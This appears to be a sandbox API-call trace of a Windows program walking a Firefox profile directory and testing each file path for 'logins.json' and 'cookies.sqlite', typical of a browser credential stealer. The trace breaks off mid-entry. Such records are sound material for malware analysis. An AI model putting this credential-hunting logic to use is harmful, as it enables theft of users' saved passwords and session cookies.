lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*" [0160.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*", lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0160.994] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.994] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.995] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.995] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.995] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc37c9330, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc37c9330, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc37df2c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-05_5.json", cAlternateFileName="BOOKMA~1.JSO")) returned 1 [0160.995] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.995] lstrlenW (lpString="\\") returned 1 [0160.995] GetProcessHeap () returned 0x8e0000 [0160.995] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925518 [0160.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.995] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.995] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0160.995] lstrlenW (lpString="bookmarks-2017-06-05_5.json") returned 27 [0160.995] GetProcessHeap () returned 0x8e0000 [0160.995] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9255f8 [0160.995] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.995] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-05_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" [0160.995] VirtualQuery (in: lpAddress=0x925518, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.995] GetProcessHeap () returned 0x8e0000 [0160.995] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925518 | out: hHeap=0x8e0000) returned 1 [0160.995] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="logins.json") returned 0x0 [0160.995] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="cookies.sqlite") returned 0x0 [0160.995] VirtualQuery (in: lpAddress=0x9255f8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.995] GetProcessHeap () returned 0x8e0000 [0160.995] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255f8 | out: hHeap=0x8e0000) returned 1 [0160.995] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 1 [0160.995] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0160.995] lstrlenW (lpString="\\") returned 1 [0160.996] GetProcessHeap () returned 0x8e0000 [0160.996] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x925518 [0160.996] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.996] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.996] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0160.996] lstrlenW (lpString="bookmarks-2017-06-16_5.json") returned 27 [0160.996] GetProcessHeap () returned 0x8e0000 [0160.996] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9255f8 [0160.996] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0160.996] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-16_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" [0160.996] VirtualQuery (in: lpAddress=0x925518, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.996] GetProcessHeap () returned 0x8e0000 [0160.996] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925518 | out: hHeap=0x8e0000) returned 1 [0160.996] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="logins.json") returned 0x0 [0160.996] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="cookies.sqlite") returned 0x0 [0160.996] VirtualQuery (in: lpAddress=0x9255f8, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.996] GetProcessHeap () returned 0x8e0000 [0160.996] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255f8 | out: hHeap=0x8e0000) returned 1 [0160.996] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 0 [0160.996] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0160.997] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.997] GetProcessHeap () returned 0x8e0000 [0160.997] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.997] VirtualQuery (in: lpAddress=0x8fcf68, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.997] GetProcessHeap () returned 0x8e0000 [0160.997] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcf68 | out: hHeap=0x8e0000) returned 1 [0160.997] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.997] GetProcessHeap () returned 0x8e0000 [0160.997] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.997] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.997] lstrlenW (lpString="\\") returned 1 [0160.997] GetProcessHeap () returned 0x8e0000 [0160.997] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0160.997] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.997] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.997] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.997] lstrlenW (lpString="bookmarkbackups") returned 15 [0160.997] GetProcessHeap () returned 0x8e0000 [0160.997] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0160.997] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.997] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0160.997] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.997] GetProcessHeap () returned 0x8e0000 [0160.998] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.998] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="logins.json") returned 0x0 [0160.998] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="cookies.sqlite") returned 0x0 [0160.998] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.998] GetProcessHeap () returned 0x8e0000 [0160.998] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb47c9bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb47c9bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0160.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.998] lstrlenW (lpString="\\") returned 1 [0160.998] GetProcessHeap () returned 0x8e0000 [0160.998] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0160.998] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.998] lstrlenW (lpString="cert8.db") returned 8 [0160.998] GetProcessHeap () returned 0x8e0000 [0160.998] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9254f8 [0160.998] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" [0160.998] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.998] GetProcessHeap () returned 0x8e0000 [0160.998] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.998] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="logins.json") returned 0x0 [0160.998] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="cookies.sqlite") returned 0x0 [0160.998] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.998] GetProcessHeap () returned 0x8e0000 [0160.998] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0160.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.998] lstrlenW (lpString="\\") returned 1 [0160.998] GetProcessHeap () returned 0x8e0000 [0160.998] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0160.998] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.999] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.999] lstrlenW (lpString="compatibility.ini") returned 17 [0160.999] GetProcessHeap () returned 0x8e0000 [0160.999] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x9254f8 [0160.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.999] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" [0160.999] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.999] GetProcessHeap () returned 0x8e0000 [0160.999] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0160.999] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="logins.json") returned 0x0 [0160.999] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="cookies.sqlite") returned 0x0 [0160.999] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.999] GetProcessHeap () returned 0x8e0000 [0160.999] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0160.999] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e8ce50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5e8ce50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb639bd10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0160.999] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.999] lstrlenW (lpString="\\") returned 1 [0160.999] GetProcessHeap () returned 0x8e0000 [0160.999] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0160.999] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS 